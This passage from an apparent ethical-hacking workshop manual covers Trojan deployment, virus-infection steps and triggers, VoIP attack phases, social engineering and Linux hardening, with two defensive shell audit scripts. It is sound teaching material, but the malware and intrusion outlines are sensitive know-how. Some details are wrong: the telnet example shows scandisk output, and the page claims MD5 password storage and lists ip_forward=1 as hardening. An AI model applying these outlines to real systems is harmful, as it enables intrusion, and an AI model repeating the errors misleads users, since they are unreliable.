1. The attacker's first step is to find a way to install the server part of the Trojan
on the target system. This is probably one of the most difficult steps in a Trojan attack. Some
of the most common ways to do this are as follows:
Autorun CD-ROMs
Instant Messengers
Physical access
EXE Binders
2. Once the server part of the Trojan is installed on the victim's system, it then binds
itself to a particular port on the target system and listens for connections. Each Trojan
listens for connections on a pre-defined specific port number. For example, the
Netbus Trojan listens for connections on the predefined port 12345.
3. Next the attacker needs to somehow find out IP address of the target system on which
the server part of the Trojan has been installed.
4. Finally, the attacker uses the client part of the Trojan tool (installed on his system) to
connect to the server part installed on the target system.
5. On most occasions, after compromising the target system with a Trojan, attackers
install a backdoor on it, so that the next time they want access to the same system, the
above cumbersome process need not be executed all over again.
Common Trojans and Backdoors
The most common Trojans allow the attacker remote access to the victim's computer. Various
means are used to trick the user into installing the program. Once installed, the attacker can use the
Trojan to have complete access to that computer, just as if he were physically sitting in front of its
keyboard. Common ways Trojans are acquired include e-mail attachments, untrusted sites,
peer-to-peer programs (i.e., Kazaa), or Instant Messenger downloads. Several of the most well-known
Trojans are: BackOrifice 2000, QAZ, Tini, Donald Dick, SubSeven, NetBus, Beast and Netcat.
Wrappers
Wrappers are programs that are used to combine Trojan programs with legitimate programs.
This combined, wrapped executable is then forwarded to the victim. The victim sees only the one,
legitimate program and upon installation, is tricked into installing the Trojan. Not all of these
programs will give the attacker the icon he needs to trick the victim into executing the program.
So, tools such as Michelangelo or IconPlus will be used to alter the installation icon. It can be
made to look like anything from a Microsoft Office 2000 icon, to a setup icon for the latest
computer game.
Covert Channels
Covert channels rely on the principle that you cannot deny what you must permit. Therefore, if
protocols such as HTTP, ICMP, and DNS are allowed through the firewall, these malicious
programs will utilize those openings. Three of the top covert channel programs are listed below:
ACK CMD - Uses TCP ACKs as a covert channel
Loki – Uses ICMP as a covert channel
Reverse WWW Shell – Uses HTTP as a covert channel
Backdoor Countermeasures
The cheapest countermeasure to implement is that of educating users not to download and install
applications from e-mail or the Internet. Anti-virus software must also be installed and kept
current. Outdated anti-virus software is of little to no value. If you suspect a computer has become
infected with a Trojan or backdoor:
use a port-monitoring tool to investigate running processes and applications and,
install a cleaner to remove the malicious software.
Port Monitoring Tools
The tools listed below are one quick and simple way to investigate the programs and processes
running on a computer. Even without the add-on tools listed below, you can still get a good look at
running processes and applications by using the GUI Task Manager. Another built-in port activity
tool that is command line based is Netstat. Fortunately, there are lots of good port monitoring tools
available to monitor programs and processes. Several of these are: Fport, TCPView, Process
Viewer and Inzider.
System File Verification
Whenever Trojans are discovered, you will need to thoroughly investigate the amount of damage
that has been done. Remember that the three basic tenets of security are confidentiality, integrity,
and availability. One or more of these most likely has been violated. If you are no longer sure of
the integrity of the file system, you will be required to reinstall from a known, good backup media.
There are other ways to verify the integrity of the system. These include: WFP (Windows File
Protection), MD5SUM and TripWire.
11. BATCH PROGRAMMING & VIRUS CODING
Viruses
A computer virus is nothing more than a malicious program that is capable of duplicating itself
solely for the purpose of causing damage. Viruses do not spontaneously execute on one's
computer; they must be given control via an overt act, such as clicking on an executable file
attached to an email message, or via an implicit permission that allows your software (IE for
example) to automatically execute certain kinds of programs (or scripts). Typically, when a virus
gets control it copies itself into other files on one's system and then tries to hitch a ride via email or
other network-based means to other computers. Viruses can only spread by infecting other
objects like programs, files, documents, or e-mail attachments. If a virus fails to infect a file or
program, it cannot spread. Some well-known viruses that have destroyed data and infected
computer systems include: Chernobyl, ExploreZip, I Love You and Melissa.
Unlike a virus, a worm is a self-propagating program. Worms copy themselves from one
computer to another, often without the user's knowledge. Some well-known worms that have
destroyed data and infected computer systems include: Pretty Park Worm, Code Red Worm,
W32/Klez Worm, BugBear Worm, W32/Opaserv Worm, SQL Slammer Worm,
MS Blaster and Nimda Worm.
Batch Programming
Batch file programming is nothing but the Windows version of Unix shell programming. Let's
start by understanding what happens when we give a DOS command. DOS is basically a file
called command.com. It is this file (command.com) which handles all DOS commands that you
give at the DOS prompt, such as COPY, DIR, DEL etc. These commands are built into the
command.com file (such built-in commands are called internal commands). DOS
also has external commands, such as FORMAT, UNDELETE, BACKUP etc.
So whenever we give a DOS command, either internal or external, command.com either
executes the command itself (internal commands) or calls a separate external
program which executes the command for it and returns the result (external commands).
Why do we need Batch File Programs?
Say you need to execute a set of commands over and over again to perform a routine task, like
backing up important files or deleting temporary files (*.tmp, *.bak, ~.* etc.). It is tedious
to type the same set of commands over and over again. To run such a bulk set of commands
repeatedly, batch files are used. Batch files are to DOS what macros are to Microsoft
Office: they perform an automated, predefined set of tasks over and over again.
How to create batch files?
Batch files are basically plain text files containing DOS commands. So the best editor to write your
commands in would be Notepad or the DOS Editor (EDIT). All you need to remember is that a
batch file should have the extension .BAT (dot bat). Executing a batch file is quite simple too. For
example, if you create a batch file and save it with the filename batch.bat, then all you need to do to
execute the batch file is to type:
C:\windows>batch.bat
What happens when you give a Batch file to the command.com to execute?
Whenever command.com comes across a batch file program, it goes into batch mode. In the batch
mode, it reads the commands from the batch file line by line. So basically what happens is,
command.com opens the batch file and reads the first line, then it closes the batch file. It then
executes the command and again reopens the batch file and reads the next line from it. Batch files
are treated as Internal DOS commands.
Note
While creating a batch file, one thing that you need to keep in mind is that the filename of the batch
file should not be the same as a DOS command. For example, if you create a batch file by
the name dir.bat and then try to execute it at the prompt, nothing will happen. This is because when
command.com comes across a command, it first checks to see if it is an internal command. If it is
not, then command.com checks whether there is a .COM, .EXE or .BAT file with a matching filename. All
external DOS commands use either a .COM or a .EXE extension, so DOS never bothers to check whether
the batch program exists.
First take up a simple batch file which executes or launches a .EXE program. Simply type the
following in a blank text file and save it with a .BAT extension.
C:
cd windows
telnet
Now let's analyze the code. The first line tells command.com to go to the C: drive. Next it tells it to change
the current directory to Windows. The last line tells it to launch the telnet client. You may
object that the full filename is telnet.exe. Yes, you are right, but the .exe extension is
automatically added by command.com. Normally we do not need to change the drive and the
directory, as the Windows directory is the default DOS folder. So instead the batch file could simply
contain the line below and would still work.
telnet
Launch command.com (DOS) and execute the batch file by typing:
C:\WINDOWS>batch_file_name
You would get the following result:
C:\WINDOWS>scandisk
And Scandisk is launched. So now you know the basic functioning of batch files.
Let's move on to Batch file commands
The REM Command-
The simplest basic batch file command is REM, the Remark command. It is used
extensively by programmers to insert comments into their code to make it more readable
and understandable. Anything on the line after REM is ignored; it is not even displayed on
the screen during execution.
ECHO: The Batch Printing Tool-
The ECHO command is used for what the Print command is in other programming
languages: to display something on the screen. It can be used to tell the user what the
batch file is currently doing.
We can prevent a particular command from being shown, while still executing it, by
preceding the command with an @ sign.
The EXIT command- Ends your batch file.
Virus Writing
Types of Viruses
Boot Viruses
Program Viruses
Multipartite Viruses
Stealth Viruses
Polymorphic Viruses
Macro Viruses
ActiveX
FAT
COM Viruses
Virus Infection
STEP I- Finding file to infect
Efficiency in finding a file to infect increases the performance of the virus.
STEP II- Check Virus Infection Criteria
Check whether file and program should be infected or not.
STEP III- Check for previous Infection
Check whether the file is already infected or not.
STEP IV- Infect the File
Save the file attributes; Change the file attribute to nothing; Open the file in read/write mode; Run
virus routines.
STEP V- Covering Tracks
Restore file attributes to avoid detection.
Trigger Mechanism
Set a logical condition for activation of the virus. Triggers are of the following types:
Counter Trigger
KeyStroke Trigger
Time Trigger
Replication Trigger
System Parameter Trigger
Null Trigger
12. MOBILE PHONE & VOIP HACKING
Introduction
Voice Over Internet Protocol (VOIP) refers to the transmission of voice over IP based networks.
It is also known as "Packet Telephony". It uses the IP protocol to route voice traffic. Voice is compressed
using CODECS, hence bandwidth is utilized efficiently. It is renowned for its low cost and is
advantageous to customers in the case of long distance calls.
VOIP Hacking Steps
Footprinting
Scanning
Enumeration
Exploiting the network
Footprinting
Public web site research; Google hacking; WHOIS & DNS analysis. Information includes:
Organizational Structure and corporate locations
Help & Tech Support
Job Listings
Domain name Lookup
Phone numbers and extensions
VoIP vendors press releases and case studies
Resumes
Mailing lists and local user group postings
Web based VoIP logins
Scanning
Collect a list of active targets and figure out what devices are accessible on the network. Ping a large
number of IP addresses and wait for any responses.
Methods to Ping:
ICMP ping sweeps
ARP pings
TCP ping scans
SNMP sweeps
Determine the vulnerabilities present on the target host or devices.
Method to scan active services:
TCP scan
UDP scan
Determine the type of devices, hosts by OS and firmware types.
Method to identify host/devices:
Stack Fingerprinting
Tools to be used:
Nmap
Xprobe2
Arkin
Queso
Snacktime
Enumeration
Extract user names using Win2k enumeration.
Gather information from the host using null sessions.
Perform windows enumeration using SuperScan4.
Get the users' accounts using GetAcct.
Perform an SNMP port scan using SNScanV1.05.
Exploiting the network
Launch various attacks based on the vulnerabilities found
Compromise a network node
Gain access to the network
Now access the network and start sniffing
Intercept through VoIP signaling manipulation to insert rogue applications.
13. SOCIAL ENGINEERING
Social Engineering is the art of manipulation and the skill of exploiting human weakness. A social
engineering attack may occur over the phone, by e-mail, by a personal visit, or through the
computer. The intent of the attack is to acquire information, such as user IDs and passwords.
While these attacks may seem relatively low-tech, they target an organization's weakest link, its
employees.
Common Types of Social Engineering
Social engineering attacks can be divided into two categories:
Human Based
Computer Based
Human Based Impersonation
Human based attacks are relatively low-tech and are reminiscent of a scam or something you would
expect from a con man. The six primary types of human based social engineering are listed below:
Important User
Tech Support
Third Party Authorization
In Person
Dumpster Diving
Shoulder Surfing
Computer Based Impersonation
This type of social engineering attack attempts to use a computer as the interface. These attacks can
come in any of the following forms:
Mail Attachments
Popup Windows
Website Faking
SPAM
Social Engineering Prevention
Defense requires a good offense. Employees need to be made aware of social engineering attacks.
They must also be given procedures that can be used to verify an individual's identity. Training
and education must be continual to remind employees to protect valuable resources. The following
three steps can help protect your organization from this easy to launch, hard to prevent attack:
Policies and Procedures
Training
Employee Education
14. LINUX HACKING
Linux Basics
Linux is case sensitive
Linux filenames can contain a maximum of 256 characters
In Linux, file extensions don't play a big role and are not necessary
Its file system is hierarchical
In Linux we don't have drive letters; instead, disks are recognized as /dev/sda1, /dev/sda2, etc.
The Linux root directory is denoted by /
Nano, vi, vim and pico are widely used command line editors
cp is the command to copy a file
mv is the command to move or rename a file
mkdir is the command to create a directory
rmdir is the command to remove empty directories
rm is the command to delete files and folders
find is the command to find files
In Linux we have three types of user:
Root user, Service User, Normal User
The root user will always have uid:gid = 0:0
Normal users will always have uid:gid starting from 500:500
Service users' uid:gid always lie between 0 and 500
Service users are not allowed to log in by default, whereas root and normal users can log in
A user's User Id, Group Id, home directory and shell are allocated in the /etc/passwd file
Linux passwords are stored as MD5 hashes in the /etc/shadow file
arp is a command which is mostly used for checking existing Ethernet connectivity and
IP addresses
ifconfig is a command line tool which checks all interface cards and shows information
regarding them
ps is a command which lists all existing processes on the server
route is a command which lists all routing tables for your server
shred is a command which deletes a file securely by overwriting its contents
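The three user types and their uid bands above can be audited directly from the passwd file. The following is an added shell example, not part of the workshop material: it classifies each account by the uid bands given above and flags service accounts that still have a login shell, since the page says service users are not meant to log in. The sample passwd entries are constructed; on a real host the input is /etc/passwd.

```shell
#!/bin/sh
# Added example (not from the workshop material): classify passwd entries by the uid
# bands listed above (0 = root, below 500 = service, 500 and up = normal) and flag
# service accounts that still have a login shell, since service users are not meant
# to log in. Newer distributions start normal users at 1000; adjust NORMAL_MIN then.
NORMAL_MIN=500

# classify_passwd FILE: prints "name uid class login-status" for every
# name:x:uid:gid:gecos:home:shell line; a service account with a login shell
# gets the suffix " <-- review".
classify_passwd() {
  awk -F: -v min="$NORMAL_MIN" '
    NF >= 7 {
      uid = $3 + 0
      if (uid == 0)       cls = "root"
      else if (uid < min) cls = "service"
      else                cls = "normal"
      # nologin and false shells cannot start an interactive session
      nologin = ($7 ~ /nologin$/ || $7 == "/bin/false")
      status  = nologin ? "no-login" : "login-capable"
      flag    = (cls == "service" && !nologin) ? " <-- review" : ""
      printf "%-10s uid=%-5d %-8s %s%s\n", $1, uid, cls, status, flag
    }' "$1"
}

# count_flagged FILE: number of service accounts that can log in (0 if none).
count_flagged() {
  classify_passwd "$1" | grep -c -- '<-- review' || true
}

# Constructed sample so the example runs offline; on a real host pass /etc/passwd.
sample_passwd_file() {
  f=$(mktemp)
  printf '%s\n' 'root:x:0:0:root:/root:/bin/bash' \
                'daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin' \
                'postgres:x:26:26:PostgreSQL:/var/lib/pgsql:/bin/bash' \
                'alice:x:500:500:Alice:/home/alice:/bin/bash' > "$f"
  echo "$f"
}

f=$(sample_passwd_file)
classify_passwd "$f"
echo "service accounts with a login shell: $(count_flagged "$f")"
rm -f "$f"
```

A flagged account is a prompt to review, not proof of compromise: some database services legitimately keep a shell for maintenance.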
Why is Linux Hacked?
Linux is used on more than 80% of all web servers on the internet. Finding a vulnerability in such a
popular OS or its related web server applications would mean that you can virtually hack into
any website on the internet, depending upon the type of vulnerability. Linux users generally use no
antivirus program, which makes it more difficult to detect whether a Linux machine is compromised or
not. For servers a lot of rootkit scanners and software firewalls are available; however, they are not
very easy to use and configure, as Linux is not very user friendly for non-technical people.
Recent Vulnerabilities
Kerberos Vulnerability-[USN-999-1]
LVM2 Vulnerability-[USN-1001-1]
Apache Vulnerability-[USN-990-2]
Dpkg Vulnerability-[USN-986-3]
Secure your Linux
Linux has many built-in mechanisms to secure itself.
/etc/sysctl.conf- sysctl.conf is used to alter the parameters of the Linux kernel to make it more
secure.
Apply the following configuration (in the dotted key = value form that sysctl.conf expects):
net.ipv4.conf.all.rp_filter = 1
net.ipv4.conf.all.log_martians = 1
net.ipv4.conf.all.send_redirects = 0
net.ipv4.conf.all.accept_source_route = 0
net.ipv4.conf.all.accept_redirects = 0
net.ipv4.tcp_syncookies = 1
net.ipv4.icmp_echo_ignore_broadcasts = 1
net.ipv4.ip_forward = 1
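Writing the list into sysctl.conf is only half the job; the host has to be checked against it afterwards. The following is an added shell example, not part of the workshop material: it compares a capture of the live sysctl values (dotted key=value form) with the settings above and reports every missing or drifted parameter; the sample "current state" file is constructed. The value ip_forward=1 is kept as the page gives it, although on a host that does not route packets, 0 is the usual hardened value.

```shell
#!/bin/sh
# Added example (not from the workshop material): audit a host's live sysctl values
# against the hardening list above, in the dotted key=value form sysctl uses.
# ip_forward=1 is kept because the page lists it; review it on non-routing hosts.
EXPECTED='net.ipv4.conf.all.rp_filter=1
net.ipv4.conf.all.log_martians=1
net.ipv4.conf.all.send_redirects=0
net.ipv4.conf.all.accept_source_route=0
net.ipv4.conf.all.accept_redirects=0
net.ipv4.tcp_syncookies=1
net.ipv4.icmp_echo_ignore_broadcasts=1
net.ipv4.ip_forward=1'
# audit_sysctl CURRENT_FILE
#   CURRENT_FILE holds the live state as "key=value" lines, one per parameter
#   (capture it with:  sysctl -a 2>/dev/null | tr -d ' ' > current.txt).
#   Prints one line per missing or drifted parameter; the return code is the
#   number of deviations, so 0 means the host matches the whole list.
audit_sysctl() {
  current=$1
  count=0
  for pair in $EXPECTED; do            # word-splitting on newlines gives one pair per turn
    key=${pair%%=*}
    want=${pair#*=}
    # exact match on the key column, so '.' in the key is never read as a regex
    have=$(awk -F= -v k="$key" '$1 == k { print $2; exit }' "$current")
    if [ -z "$have" ]; then
      echo "MISSING  $key  (want $want)"
      count=$((count + 1))
    elif [ "$have" != "$want" ]; then
      echo "DRIFT    $key=$have  (want $want)"
      count=$((count + 1))
    fi
  done
  return $count
}
# Constructed sample of a partially hardened host so the example runs offline:
# log_martians is switched off and four of the eight parameters were never set.
sample_current_file() {
  f=$(mktemp)
  printf '%s\n' 'net.ipv4.conf.all.rp_filter=1' \
                'net.ipv4.conf.all.log_martians=0' \
                'net.ipv4.tcp_syncookies=1' \
                'net.ipv4.ip_forward=1' > "$f"
  echo "$f"
}
# Audit the sample by default; pass --live to audit this machine instead.
if [ "${1:-}" = "--live" ]; then
  cur=$(mktemp); sysctl -a 2>/dev/null | tr -d ' ' > "$cur"
else
  cur=$(sample_current_file)
fi
if audit_sysctl "$cur"; then
  echo "all listed parameters match"
else
  echo "$? deviation(s) found"
fi
rm -f "$cur"
```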
Security Enhanced Linux (SELinux)
Security Enhanced Linux (SELinux) is a Linux feature that provides a mechanism for
supporting access control security policies.
SELinux is not a separate distribution in itself but a set of modifications which are applied
to the Linux kernel to make it more secure.
SELinux has been integrated into the 2.6 series of the Linux kernel, and separate patches are
now unnecessary.
Backtrack
BackTrack is a Linux distribution known as the world's most popular security distribution for
penetration testing and vulnerability assessment.
The BackTrack distribution originated from the merger of two formerly competing
distributions which focused on penetration testing:
WHAX: a SLAX based Linux distribution.
Auditor Security Collection: a Live CD based on Knoppix.
The overlap between Auditor and WHAX in purpose and tool collection partly led to the merger.
Patch Management
Patch management is part of the job role of a system administrator. The task involves
applying and testing multiple patches on the available computer systems. Patch management
tasks include:
Maintaining the set of available patches from the vendor
Deciding which patches to apply first, based on their nature as critical or optional
Ensuring that patches are successfully installed
Testing the system for stability after installation
There are a lot of automated tools available in the market to automate this process, including
RingMaster's Automated Patch Management and Gilbrator's Everguard.
SSH Connection
SSH is a protocol which enables remote administration of computers over encrypted
connections. An SSH client is used to log in to a remote machine and allows the execution of
commands on that machine.
RSH and Telnet also allow remote administration of computers in a similar way to SSH,
but these protocols are insecure and transfer data in plain text over the network.
The ssh command and OpenSSH on Linux, and PuTTY on Windows, can be used as an SSH client to
communicate with an SSH server.
SSH Tunneling
SSH tunneling can be used to bypass the security restrictions imposed by a proxy server and
firewall on a network. During tunneling, the SSH client is used to carry the data meant
for other protocols such as SMB or HTTP.
For SSH tunneling we require two machines, one inside the restricted network and
the other outside the network. The system outside the restricted network should be
configured as a server and the system inside the restricted network should be configured as
the SSH client.
E.g., we have a situation where port 22 is open in the restricted network and all the other services
like FTP, HTTP & SMTP are blocked. In this scenario we can use SSH tunneling to
browse the normal internet by using the SSH server as a proxy which fetches the web pages for
the client and sends the data wrapped in the SSH protocol, which is allowed in the network.
SSH tunneling can also be used to carry otherwise unencrypted network traffic between the SSH
client and server inside the encrypted connection.
Advantages of Linux
COST- Linux is an open source project, as it comes under the GNU General Public License. Cost is
the major factor why Linux is used on more than 80% of servers throughout the world.
SECURITY- Linux is also considered more secure than Windows, as most
malware actually targets Windows based computers. Linux has a better user permissions
model, which makes it more secure.
STABILITY- Linux is quite stable in comparison to Windows.
Disadvantages of Linux
Due to being open source, the Linux source code and the source code of its associated applications are
easily available, which makes it easier to discover security vulnerabilities and flaws. These can
be exploited in the wild by hackers.
HARDWARE COMPATIBILITY ISSUE- Linux does not support the latest hardware in some
cases, due to which it becomes very uncomfortable for a normal desktop user to use Linux as
a main OS over Windows.
Linux is not very easy to use for normal people, as it requires extensive knowledge of
operating systems and networking to use it comfortably. So, it can be a bit of a hassle for a non-technical
person.